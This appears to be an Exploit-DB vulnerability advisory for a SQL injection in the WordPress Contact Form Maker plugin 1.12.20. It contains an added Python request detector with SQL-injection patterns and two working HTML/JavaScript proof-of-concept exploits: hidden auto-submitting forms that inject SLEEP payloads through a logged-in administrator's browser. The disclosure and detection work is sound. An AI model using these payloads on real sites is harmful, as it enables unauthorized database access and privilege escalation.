Vendor: WordPress Contact Form Maker plugin
Author: Neven Biruski
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: WordPress Contact Form Maker plugin
Affected Version From: 1.12.20 and below
Affected Version To: Not provided
Patch Exists: YES
Related CWE: Not provided
CPE: a:wordpress_contact_form_maker_project:wordpress_contact_form_maker:1.12.20
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2018

WordPress Contact Form Maker Plugin 1.12.20 – SQL Injection

The WordPress Contact Form Maker Plugin version 1.12.20 and below is vulnerable to SQL Injection. By sending specially crafted requests to the plugin settings page, an attacker with appropriate privileges can exploit these vulnerabilities to escalate their privileges or modify database contents.

Mitigation:

Update to the latest version of the WordPress Contact Form Maker plugin to fix the SQL Injection vulnerability.
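As an added example (not part of the advisory or of the plugin's own code), the following detector flags admin-ajax.php requests that hit the two actions named in the PoCs and carry SQL constructs in the field each PoC injects through; the action-to-field mapping is inferred from the PoC requests, and the sample requests, the site host and the attacker origin are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# admin-ajax.php actions named in the advisory and the POST field each PoC
# injects through. Assumed from the PoC requests, not from plugin source.
VULNERABLE_ACTIONS = {"FormMakerSQLMapping_fmc": "name", "generete_csv_fmc": "search_labels"}

# "name" is used as a table name by db_table_struct, so it should be a bare identifier.
IDENT_RE = re.compile(r"^[A-Za-z0-9_]+$")
# Constructs seen in the PoC payloads: timing functions, comment/terminator
# sequences and nested SELECTs, plus UNION for the common extraction variant.
SQLI_RE = re.compile(r"(?i)\b(?:SLEEP|BENCHMARK)\s*\(|--|/\*|;|\(\s*SELECT\b|\bUNION\b")

def inspect_request(url, body, site_host, origin=None):
    """Return a finding dict for a request that abuses one of the vulnerable
    actions, or None when the request looks benign."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    action = parse_qs(parts.query).get("action", [""])[0]
    field = VULNERABLE_ACTIONS.get(action)
    if field is None:
        return None
    value = parse_qs(body, keep_blank_values=True).get(field, [""])[0]
    reasons = []
    if field == "name" and not IDENT_RE.match(value):
        reasons.append("table name is not a bare identifier")
    hits = sorted({m.group(0).upper().replace(" ", "") for m in SQLI_RE.finditer(value)})
    if hits:
        reasons.append("sql constructs: " + ", ".join(hits))
    # The PoCs auto-submit a form from a third-party page in the victim's
    # browser, so a foreign Origin on this endpoint is a second signal.
    if origin and urlsplit(origin).hostname != site_host:
        reasons.append("cross-site origin " + origin)
    return {"action": action, "field": field, "reasons": reasons} if reasons else None

# Constructed samples: the two PoC bodies as a browser would form-encode them,
# sent from a hypothetical attacker page, and one benign same-site request.
SITE = "vulnerablesite.com"
SAMPLES = [
    (f"http://{SITE}/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct",
     "name=wp_users+WHERE+42%3D42+AND+SLEEP%2842%29--%3B", "http://attacker-page.example"),
    (f"http://{SITE}/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0",
     "search_labels=%28SELECT+*+FROM+%28SELECT%28SLEEP%2842%29%29%29XXX%29", "http://attacker-page.example"),
    (f"http://{SITE}/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct",
     "name=wp_contact_form_maker", f"http://{SITE}"),
]

def scan_samples():
    """Run the detector over SAMPLES; returns one entry (finding or None) per sample."""
    return [inspect_request(url, body, SITE, origin) for url, body, origin in SAMPLES]

if __name__ == "__main__":
    for url, finding in zip((s[0] for s in SAMPLES), scan_samples()):
        print("ALERT" if finding else "ok   ", url.split("?")[0], finding and finding["reasons"])
```

Applied to real traffic, the body must be taken from the request log or a WAF hook, since standard access logs record only the query string.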

Exploit-DB raw data:

# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
# Date: 2018-06-07
# Author: Neven Biruski
# Software: WordPress Contact Form Maker plugin
# Software link: https://wordpress.org/plugins/contact-form-maker/
# Version: 1.12.20 and below

# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.


# PoC 1

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>

# PoC 2

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>